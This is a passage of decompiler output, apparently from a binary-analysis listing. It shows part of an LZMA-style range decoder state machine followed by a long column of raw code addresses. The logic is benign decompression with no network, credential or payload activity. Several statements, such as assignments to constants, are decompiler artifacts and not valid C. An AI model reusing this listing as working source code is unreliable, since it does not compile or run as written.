							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                0x00000000
                                                                                0x00405fa4
                                                                                0x00405fa4
                                                                                0x00405fa9
                                                                                0x00406020
                                                                                0x00406027
                                                                                0x00406031
                                                                                0x00406610
                                                                                0x00406610
                                                                                0x00406613
                                                                                0x00406613
                                                                                0x00406619
                                                                                0x0040661f
                                                                                0x00406625
                                                                                0x0040663f
                                                                                0x00406642
                                                                                0x00406648
                                                                                0x00406653
                                                                                0x00406655
                                                                                0x00406627
                                                                                0x00406627
                                                                                0x00406636
                                                                                0x0040663a
                                                                                0x0040663a
                                                                                0x0040665f
                                                                                0x00406686
                                                                                0x00406686
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00000000
                                                                                0x00406661
                                                                                0x00406661
                                                                                0x00406665
                                                                                0x00406814
                                                                                0x00000000
                                                                                0x00406814
                                                                                0x00406671
                                                                                0x00406678
                                                                                0x00406680
                                                                                0x00406683
                                                                                0x00000000
                                                                                0x00406683
                                                                                0x00405fab
                                                                                0x00405fab
                                                                                0x00405faf
                                                                                0x00405fb7
                                                                                0x00405fba
                                                                                0x00405fbc
                                                                                0x00405fbf
                                                                                0x00405fc1
                                                                                0x00405fc6
                                                                                0x00405fc9
                                                                                0x00405fd0
                                                                                0x00405fd7
                                                                                0x00405fda
                                                                                0x00405fe5
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405ff4
                                                                                0x00406012
                                                                                0x00406014
                                                                                0x004061e7
                                                                                0x004061e7
                                                                                0x004061ea
                                                                                0x004061ed
                                                                                0x004061f0
                                                                                0x004061f3
                                                                                0x004061f6
                                                                                0x004061f9
                                                                                0x004061fc
                                                                                0x004061ff
                                                                                0x00406205
                                                                                0x0040621d
                                                                                0x00406220
                                                                                0x00406223
                                                                                0x00406226
                                                                                0x00406226
                                                                                0x00406229
                                                                                0x0040622f
                                                                                0x00406207
                                                                                0x00406207
                                                                                0x0040620f
                                                                                0x00406214
                                                                                0x00406216
                                                                                0x00406218
                                                                                0x00406218
                                                                                0x00406239
                                                                                0x0040623c
                                                                                0x004061df
                                                                                0x004061e5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x004061ba
                                                                                0x004061be
                                                                                0x004067c6
                                                                                0x00000000
                                                                                0x004067c6
                                                                                0x004061c4
                                                                                0x004061c7
                                                                                0x004061ca
                                                                                0x004061ce
                                                                                0x004061d1
                                                                                0x004061d7
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061dc
                                                                                0x00000000
                                                                                0x004061dc
                                                                                0x00405ff6
                                                                                0x00405ff6
                                                                                0x00405ff9
                                                                                0x00405fff
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406004
                                                                                0x00406007
                                                                                0x00406009
                                                                                0x0040600a
                                                                                0x0040600d
                                                                                0x0040607a
                                                                                0x0040607a
                                                                                0x0040607e
                                                                                0x00406081
                                                                                0x00406084
                                                                                0x00406087
                                                                                0x0040608a
                                                                                0x0040608b
                                                                                0x0040608e
                                                                                0x00406090
                                                                                0x00406096
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x0040609f
                                                                                0x004060a2
                                                                                0x004060a8
                                                                                0x004060c4
                                                                                0x004060c7
                                                                                0x004060ca
                                                                                0x004060cd
                                                                                0x004060d4
                                                                                0x004060da
                                                                                0x004060de
                                                                                0x004060aa
                                                                                0x004060aa
                                                                                0x004060ae
                                                                                0x004060b6
                                                                                0x004060bb
                                                                                0x004060bd
                                                                                0x004060bf
                                                                                0x004060bf
                                                                                0x004060e8
                                                                                0x004060eb
                                                                                0x00406062
                                                                                0x00406062
                                                                                0x00406068
                                                                                0x0040611b
                                                                                0x00406121
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406123
                                                                                0x00406126
                                                                                0x00406129
                                                                                0x0040612c
                                                                                0x0040612f
                                                                                0x00406132
                                                                                0x00406135
                                                                                0x00406138
                                                                                0x0040613b
                                                                                0x00406141
                                                                                0x00406159
                                                                                0x0040615c
                                                                                0x0040615f
                                                                                0x00406162
                                                                                0x00406162
                                                                                0x00406165
                                                                                0x0040616b
                                                                                0x00406143
                                                                                0x00406143
                                                                                0x0040614b
                                                                                0x00406150
                                                                                0x00406152
                                                                                0x00406154
                                                                                0x00406154
                                                                                0x00406175
                                                                                0x00406178
                                                                                0x004060f6
                                                                                0x004060fa
                                                                                0x004067ba
                                                                                0x00000000
                                                                                0x004067ba
                                                                                0x00406100
                                                                                0x00406103
                                                                                0x00406106
                                                                                0x0040610a
                                                                                0x0040610d
                                                                                0x00406113
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x00406118
                                                                                0x00406178
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x00406183
                                                                                0x00406183
                                                                                0x00406186
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x00406074
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x0040603d
                                                                                0x00406041
                                                                                0x004067ae
                                                                                0x0040682a
                                                                                0x00406832
                                                                                0x00406839
                                                                                0x0040683b
                                                                                0x00406842
                                                                                0x00406846
                                                                                0x00406846
                                                                                0x00406047
                                                                                0x0040604a
                                                                                0x0040604d
                                                                                0x00406051
                                                                                0x00406054
                                                                                0x0040605a
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605f
                                                                                0x00000000
                                                                                0x0040605f
                                                                                0x004060eb
                                                                                0x00405ff4
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e31
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000
                                                                                0x0040683f
                                                                                0x00405e37
                                                                                0x00000000
                                                                                0x00405e42
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e4b
                                                                                0x00405e4e
                                                                                0x00405e51
                                                                                0x00405e55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e5b
                                                                                0x00405e5e
                                                                                0x00405e60
                                                                                0x00405e61
                                                                                0x00405e64
                                                                                0x00405e66
                                                                                0x00405e67
                                                                                0x00405e69
                                                                                0x00405e6c
                                                                                0x00405e71
                                                                                0x00405e76
                                                                                0x00405e7f
                                                                                0x00405e92
                                                                                0x00405e95
                                                                                0x00405ea1
                                                                                0x00405ec9
                                                                                0x00405ecb
                                                                                0x00405ed9
                                                                                0x00405ed9
                                                                                0x00405edd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ecd
                                                                                0x00405ed0
                                                                                0x00405ed1
                                                                                0x00405ed1
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ea7
                                                                                0x00405eac
                                                                                0x00405eac
                                                                                0x00405eb5
                                                                                0x00405ebd
                                                                                0x00405ec0
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ee3
                                                                                0x00405ee3
                                                                                0x00405ee7
                                                                                0x00406793
                                                                                0x00000000
                                                                                0x00406793
                                                                                0x00405ef0
                                                                                0x00405f00
                                                                                0x00405f03
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f09
                                                                                0x00405f0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f0f
                                                                                0x00405f15
                                                                                0x00405f3f
                                                                                0x00405f45
                                                                                0x00405f4c
                                                                                0x00000000
                                                                                0x00405f4c
                                                                                0x00405f1b
                                                                                0x00405f1e
                                                                                0x00405f23
                                                                                0x00405f23
                                                                                0x00405f2e
                                                                                0x00405f36
                                                                                0x00405f39
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f7e
                                                                                0x00405f84
                                                                                0x00405f87
                                                                                0x00405f94
                                                                                0x00405f9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f53
                                                                                0x00405f53
                                                                                0x00405f57
                                                                                0x004067a2
                                                                                0x00000000
                                                                                0x004067a2
                                                                                0x00405f63
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f71
                                                                                0x00405f74
                                                                                0x00405f77
                                                                                0x00405f7c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406243
                                                                                0x00406247
                                                                                0x00406265
                                                                                0x00406268
                                                                                0x0040626f
                                                                                0x00406272
                                                                                0x00406275
                                                                                0x00406278
                                                                                0x0040627b
                                                                                0x0040627e
                                                                                0x00406280
                                                                                0x00406287
                                                                                0x00406288
                                                                                0x0040628a
                                                                                0x0040628d
                                                                                0x00406290
                                                                                0x00406293
                                                                                0x00406293
                                                                                0x00406298
                                                                                0x00000000
                                                                                0x00406298
                                                                                0x00406249
                                                                                0x0040624c
                                                                                0x0040624f
                                                                                0x00406259
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062ad
                                                                                0x004062b1
                                                                                0x004062d4
                                                                                0x004062d7
                                                                                0x004062da
                                                                                0x004062e4
                                                                                0x004062b3
                                                                                0x004062b3
                                                                                0x004062b6
                                                                                0x004062b9
                                                                                0x004062bc
                                                                                0x004062c9
                                                                                0x004062cc
                                                                                0x004062cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062f0
                                                                                0x004062f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062fa
                                                                                0x004062fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406304
                                                                                0x00406306
                                                                                0x0040630a
                                                                                0x0040630a
                                                                                0x0040630d
                                                                                0x00406311
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406361
                                                                                0x00406365
                                                                                0x0040636c
                                                                                0x0040636f
                                                                                0x00406372
                                                                                0x0040637c
                                                                                0x00000000
                                                                                0x0040637c
                                                                                0x00406367
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406388
                                                                                0x0040638c
                                                                                0x00406393
                                                                                0x00406396
                                                                                0x00406399
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040639c
                                                                                0x0040639f
                                                                                0x004063a2
                                                                                0x004063a2
                                                                                0x004063a5
                                                                                0x004063a8
                                                                                0x004063ab
                                                                                0x004063ab
                                                                                0x004063ae
                                                                                0x004063b5
                                                                                0x004063ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406448
                                                                                0x00406448
                                                                                0x0040644c
                                                                                0x004067ea
                                                                                0x00000000
                                                                                0x004067ea
                                                                                0x00406452
                                                                                0x00406455
                                                                                0x00406458
                                                                                0x0040645c
                                                                                0x0040645f
                                                                                0x00406465
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x0040646a
                                                                                0x0040646d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004064cb
                                                                                0x004064cb
                                                                                0x004064cf
                                                                                0x004067f6
                                                                                0x00000000
                                                                                0x004067f6
                                                                                0x004064d5
                                                                                0x004064d8
